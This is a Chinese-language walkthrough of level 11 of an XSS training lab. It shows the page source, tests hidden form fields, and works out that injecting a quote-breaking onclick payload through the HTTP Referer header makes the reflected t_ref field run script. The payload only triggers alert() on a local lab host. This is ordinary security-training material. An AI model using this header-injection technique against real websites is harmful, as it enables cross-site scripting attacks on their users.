<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错！");
 window.location.href="level12.php?keyword=good job!"; 
}
</script>
<title>欢迎来到level11</title>
</head>
<body>
<h1 align=center>欢迎来到level11</h1>
<h2 align=center>没有找到和good job!相关的结果.</h2><center>
<form id=search>
<input name="t_link"  value="" type="hidden">
<input name="t_history"  value="" type="hidden">
<input name="t_sort"  value="" type="hidden">
<input name="t_ref"  value="http://192.168.199.153/xss/level10.php?keyword=well%20done!&t_sort=%22type=%22test%22%20onclick=%22alert()" type="hidden">
</form>
</center><center><img src=level11.png></center>
<h3 align=center>payload的长度:9</h3></body>
</html>

先按照第十关的方法试一下看能不能在输入框中解决。

http://192.168.199.153/xss/level11.php?keyword=good%20job!&t_link=123

<input name="t_link"  value="" type="hidden">

http://192.168.199.153/xss/level11.php?keyword=good%20job!&t_history=123

<input name="t_history"  value="" type="hidden">

http://192.168.199.153/xss/level11.php?keyword=good%20job!&t_sort=123

<input name="t_sort"  value="" type="hidden">

http://192.168.199.153/xss/level11.php?keyword=good%20job!&t_ref=123

<input name="t_ref"  value="" type="hidden">

　通过测试都不能使用。发现 t_ref 输入框中有value值，并且是url

使用火狐浏览器打开第十一关的URL，安装插件hackbar，安装好后，查看一下网络

发现请求头中的　referer=http://192.168.199.153/xss/level11.php?keyword=good%20job!

打开hackbar 输入url，选中referer，再输入代码 "type="test" onclick="alert   ，点击Execute

这是输入框在页面中出现，点击，成功过关。